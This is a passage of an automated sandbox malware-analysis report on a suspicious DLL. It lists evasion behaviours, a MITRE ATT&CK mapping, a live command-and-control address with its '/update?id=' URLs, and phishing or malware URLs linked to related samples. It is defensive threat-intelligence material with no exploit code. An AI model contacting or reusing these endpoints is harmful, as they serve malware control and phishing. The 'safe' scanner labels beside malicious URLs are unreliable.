Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD5100030_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2710
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7167
Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_30-20634
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD510000_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD5100030_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5764Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3060Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3200Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2544Thread sleep count: 100 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6564Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6724Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6368Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5980Thread sleep count: 98 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 280Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5484Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5480Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4852Thread sleep count: 100 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5040Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3472Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4596Thread sleep count: 100 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 64Thread sleep count: 98 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7048Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3608Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3784Thread sleep count: 99 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3088Thread sleep count: 100 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1172Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1816Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6468Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3632Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2244Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6620Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132Thread sleep count: 2710 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132Thread sleep count: 7167 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132Thread sleep time: -716700s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1864Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4816Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 368Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6128Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2820Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2404Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3940Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6464Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5684Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5280Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6460Thread sleep count: 99 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: rundll32.exe, 0000001E.00000003.3942529688.000000000336C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.000000000336C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD528E0 CreateMailslotW,LoadLibraryA,GetProcAddress,0_2_6CD528E0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.90.110.169 80
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: ec2-52-90-110-169.compute-1.amazonaws.com
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD56B50 LogonUserW,0_2_6CD56B50
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD72B70 bind,30_2_6CD72B70

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		2
Service Execution		1
Valid Accounts		1
Valid Accounts		1
Valid Accounts		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API		3
Windows Service		11
Access Token Manipulation		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		3
Windows Service		11
Access Token Manipulation		Security Account Manager1
Peripheral Device Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook111
Process Injection		111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading		1
Rundll32		LSA Secrets1
Remote System Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://52.90.110.169/update?id=7e9d30a3s0%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=01b63ea5fa0%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=01b63ea50%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=71f3cbf750%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=dc53bbb9date?id=36ebb732Q0%Avira URL Cloudsafe
http://52.90.110.169/update?id=36ebb7320%Avira URL Cloudsafe
http://52.90.110.169/update?id=592b1d5c0%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=dc53bbb9r0%Avira URL Cloudsafe
http://52.90.110.169/update?id=7e9d30a3H0%Avira URL Cloudsafe
http://52.90.110.169/update?id=592b1d5c50%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=01b63ea5date?id=d791f2820%Avira URL Cloudsafe
http://52.90.110.169/update?id=7e9d30a3Q0%Avira URL Cloudsafe
http://52.90.110.169/update?id=7e9d30a30%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=71f3cbf7date?id=36ebb7320%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=71f3cbf70%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=dc53bbb90%Avira URL Cloudsafe
http://52.90.110.169/update?id=d791f2820%Avira URL Cloudsafe
http://52.90.110.169/update?id=6171a2b60%Avira URL Cloudsafe
http://52.90.110.169/update?id=36ebb732R0%Avira URL Cloudsafe
http://52.90.110.169:8080/update?id=dc53bbb9aa0%Avira URL Cloudsafe
http://52.90.110.169/update?id=36ebb732Q0%Avira URL Cloudsafe
http://52.90.110.169/update?id=8a8b3aa50%Avira URL Cloudsafe
http://52.90.110.169/update?id=8a8b3aa5i0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ec2-52-90-110-169.compute-1.amazonaws.com
52.90.110.169
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://52.90.110.169/update?id=592b1d5ctrue
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=01b63ea5true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=36ebb732true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=71f3cbf7true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=7e9d30a3true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=dc53bbb9true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=d791f282true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=6171a2b6true
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=8a8b3aa5true
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://52.90.110.169:8080/update?id=01b63ea5farundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=7e9d30a3Hrundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=dc53bbb9rrundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=71f3cbf75rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=592b1d5c5rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=7e9d30a3srundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=dc53bbb9date?id=36ebb732Qrundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=01b63ea5date?id=d791f282rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=7e9d30a3Qrundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=71f3cbf7date?id=36ebb732rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169:8080/update?id=dc53bbb9aarundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=36ebb732Rrundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=36ebb732Qrundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://52.90.110.169/update?id=8a8b3aa5irundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    40.113.110.67
    		unknownUnited States
    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
    1.1.1.1
    		unknownAustralia
    		13335CLOUDFLARENETUSfalse
    40.115.3.253
    		unknownUnited States
    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
    52.165.165.26
    		unknownUnited States
    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
    52.90.110.169
    		ec2-52-90-110-169.compute-1.amazonaws.comUnited States
    		14618AMAZON-AESUStrue
    162.159.36.2
    		unknownUnited States
    		13335CLOUDFLARENETUSfalse
    2.19.97.171
    		unknownEuropean Union
    		20940AKAMAI-ASN1EUfalse

    Private

    IP
    192.168.2.1
    192.168.2.7
    192.168.2.4
    192.168.2.6

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1482059
    Start date and time:2024-07-25 17:53:23 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 7m 19s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Run with higher sleep bypass
    Number of analysed new started processes analysed:42
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:LisectAVT_2403002B_14.dll
    Detection:MAL
    Classification:mal56.evad.winDLL@93/0@1/11
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 41
    • Number of non-executed functions: 13
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 192.229.221.95, 2.19.126.137
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: LisectAVT_2403002B_14.dll

    Simulations

    Behavior and APIs

    TimeTypeDescription
    11:55:21API Interceptor1105313x Sleep call for process: rundll32.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    40.113.110.679tBZHHyE73.exeGet hashmaliciousManusCrypt, NitolBrowse
      VvHbNfkom0.exeGet hashmaliciousManusCrypt, NitolBrowse
        pAQkeEk6yl.exeGet hashmaliciousManusCrypt, NitolBrowse
          1.1.1.1PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
          • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
          AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
          • 1.1.1.1/
          INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
          • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
          Go.exeGet hashmaliciousUnknownBrowse
          • 1.1.1.1/
          40.115.3.253LisectAVT_2403002C_101.dllGet hashmaliciousUnknownBrowse
            QJDOnet45r.exeGet hashmaliciousManusCrypt, NitolBrowse
              9tBZHHyE73.exeGet hashmaliciousManusCrypt, NitolBrowse
                Wff4Vci2LB.exeGet hashmaliciousManusCrypt, NitolBrowse
                  pAQkeEk6yl.exeGet hashmaliciousManusCrypt, NitolBrowse
                    file.exeGet hashmaliciousManusCryptBrowse
                      yrZHBIqyOe.exeGet hashmaliciousManusCryptBrowse
                        52.165.165.26a.exeGet hashmaliciousUnknownBrowse
                          b6HXTGQmJN.exeGet hashmaliciousAmadey, Babadeda, Glupteba, Mystic Stealer, RedLine, SmokeLoader, zgRATBrowse
                            52.90.110.169LisectAVT_2403002C_101.dllGet hashmaliciousUnknownBrowse
                            • 52.90.110.169/update?id=c2fb85b0
                            LisectAVT_2403002C_101.dllGet hashmaliciousUnknownBrowse
                            • 52.90.110.169:8080/update?id=20e113cb

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ec2-52-90-110-169.compute-1.amazonaws.comLisectAVT_2403002C_101.dllGet hashmaliciousUnknownBrowse
                            • 52.90.110.169
                            LisectAVT_2403002C_101.dllGet hashmaliciousUnknownBrowse
                            • 52.90.110.169

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSSWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                            • 162.159.135.232
                            https://notifications.google.com/g/p/ANiao5pINdT9lhgDCXkUgHdVT2B-ifrviK28tcLeml1dKiUt1vyhR8-9HwTB5zfcatXzPi7dPCsOm3yrKpsUmGyowGKSyLzV61dTTKZlAfiMhmwNFlCekkaYgwDgGxISCQjPztiW4jxuMFDoe03C_cAjdup6ZClhfusVn6MOrQKITHW7UJoxJIox4EDWHvMQK-8R_wt8iGwrzHU6AJ3TylxIydZs8g0xIPAYStVBGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            http://ahp410.acemlnb.comGet hashmaliciousHTMLPhisherBrowse
                            • 104.16.51.111
                            LisectAVT_2403002B_162.exeGet hashmaliciousCobaltStrikeBrowse
                            • 104.21.28.227
                            https://budget.us.avgcustomerservice.com/loginGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            LisectAVT_2403002B_162.exeGet hashmaliciousCobaltStrikeBrowse
                            • 104.21.28.227
                            LisectAVT_2403002B_179.exeGet hashmaliciousUnknownBrowse
                            • 172.66.43.38
                            Quotation.exeGet hashmaliciousFormBookBrowse
                            • 104.21.29.37
                            LisectAVT_2403002B_18.exeGet hashmaliciousLokibotBrowse
                            • 104.21.52.88
                            MICROSOFT-CORP-MSN-AS-BLOCKUSLisectAVT_2403002B_141.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.60
                            https://maillafayette-my.sharepoint.com/:o:/g/personal/cconnell_themailgroup_com/EiPEfQb_CGBDlFd0abPX6YIB1n8KvJoQzv3I2xEqExsGKQ?e=6alXaGGet hashmaliciousUnknownBrowse
                            • 52.108.8.12
                            LisectAVT_2403002B_198.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.42
                            https://forms.office.com/Pages/ResponsePage.aspx?id=2zW8lMsRrkyqi7IHHVNhLgILSZ8nyRhPs0os36GqVFNURElXNEQwRldKWjdYM0cwRERLSFFETE9ERy4uGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.60
                            https://yti.com/Get hashmaliciousUnknownBrowse
                            • 52.190.250.209
                            https://cabinetworkgroup.prd.mykronos.com/navigateToControl?redirectUrl=manager%3A%2Fschedule%2Cemployee%3A%2Fwfd%2Fess%2Fmyschedule&endDate=2024%2D07%2D12T00%253A00%253A00%252B00%253A00&employeeId=22002&peopleIdList=22002&startDate=2024%2D07%2D12T00%253A00%253A00%252B00%253A00Get hashmaliciousUnknownBrowse
                            • 20.231.66.93
                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                            • 13.107.42.20
                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                            • 13.107.42.20
                            Re_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.emlGet hashmaliciousUnknownBrowse
                            • 204.79.197.203
                            AMAZON-AESUSLisectAVT_2403002B_142.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                            • 44.221.84.105
                            LisectAVT_2403002B_139.exeGet hashmaliciousBdaejec, GandcrabBrowse
                            • 44.221.84.105
                            LisectAVT_2403002B_142.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                            • 44.221.84.105
                            LisectAVT_2403002B_144.exeGet hashmaliciousBdaejecBrowse
                            • 44.221.84.105
                            LisectAVT_2403002B_156.exeGet hashmaliciousBdaejecBrowse
                            • 44.221.84.105
                            https://notifications.google.com/g/p/ANiao5pINdT9lhgDCXkUgHdVT2B-ifrviK28tcLeml1dKiUt1vyhR8-9HwTB5zfcatXzPi7dPCsOm3yrKpsUmGyowGKSyLzV61dTTKZlAfiMhmwNFlCekkaYgwDgGxISCQjPztiW4jxuMFDoe03C_cAjdup6ZClhfusVn6MOrQKITHW7UJoxJIox4EDWHvMQK-8R_wt8iGwrzHU6AJ3TylxIydZs8g0xIPAYStVBGet hashmaliciousUnknownBrowse
                            • 34.201.72.119
                            http://ahp410.acemlnb.comGet hashmaliciousHTMLPhisherBrowse
                            • 54.235.205.181
                            LisectAVT_2403002B_156.exeGet hashmaliciousBdaejecBrowse
                            • 44.221.84.105
                            LisectAVT_2403002B_167.exeGet hashmaliciousBdaejecBrowse
                            • 44.221.84.105
                            MICROSOFT-CORP-MSN-AS-BLOCKUSLisectAVT_2403002B_141.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.60
                            https://maillafayette-my.sharepoint.com/:o:/g/personal/cconnell_themailgroup_com/EiPEfQb_CGBDlFd0abPX6YIB1n8KvJoQzv3I2xEqExsGKQ?e=6alXaGGet hashmaliciousUnknownBrowse
                            • 52.108.8.12
                            LisectAVT_2403002B_198.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.42
                            https://forms.office.com/Pages/ResponsePage.aspx?id=2zW8lMsRrkyqi7IHHVNhLgILSZ8nyRhPs0os36GqVFNURElXNEQwRldKWjdYM0cwRERLSFFETE9ERy4uGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.60
                            https://yti.com/Get hashmaliciousUnknownBrowse
                            • 52.190.250.209
                            https://cabinetworkgroup.prd.mykronos.com/navigateToControl?redirectUrl=manager%3A%2Fschedule%2Cemployee%3A%2Fwfd%2Fess%2Fmyschedule&endDate=2024%2D07%2D12T00%253A00%253A00%252B00%253A00&employeeId=22002&peopleIdList=22002&startDate=2024%2D07%2D12T00%253A00%253A00%252B00%253A00Get hashmaliciousUnknownBrowse
                            • 20.231.66.93
                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                            • 13.107.42.20
                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                            • 13.107.42.20
                            Re_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.emlGet hashmaliciousUnknownBrowse
                            • 204.79.197.203
                            MICROSOFT-CORP-MSN-AS-BLOCKUSLisectAVT_2403002B_141.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.60
                            https://maillafayette-my.sharepoint.com/:o:/g/personal/cconnell_themailgroup_com/EiPEfQb_CGBDlFd0abPX6YIB1n8KvJoQzv3I2xEqExsGKQ?e=6alXaGGet hashmaliciousUnknownBrowse
                            • 52.108.8.12
                            LisectAVT_2403002B_198.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.42
                            https://forms.office.com/Pages/ResponsePage.aspx?id=2zW8lMsRrkyqi7IHHVNhLgILSZ8nyRhPs0os36GqVFNURElXNEQwRldKWjdYM0cwRERLSFFETE9ERy4uGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.60
                            https://yti.com/Get hashmaliciousUnknownBrowse
                            • 52.190.250.209
                            https://cabinetworkgroup.prd.mykronos.com/navigateToControl?redirectUrl=manager%3A%2Fschedule%2Cemployee%3A%2Fwfd%2Fess%2Fmyschedule&endDate=2024%2D07%2D12T00%253A00%253A00%252B00%253A00&employeeId=22002&peopleIdList=22002&startDate=2024%2D07%2D12T00%253A00%253A00%252B00%253A00Get hashmaliciousUnknownBrowse
                            • 20.231.66.93
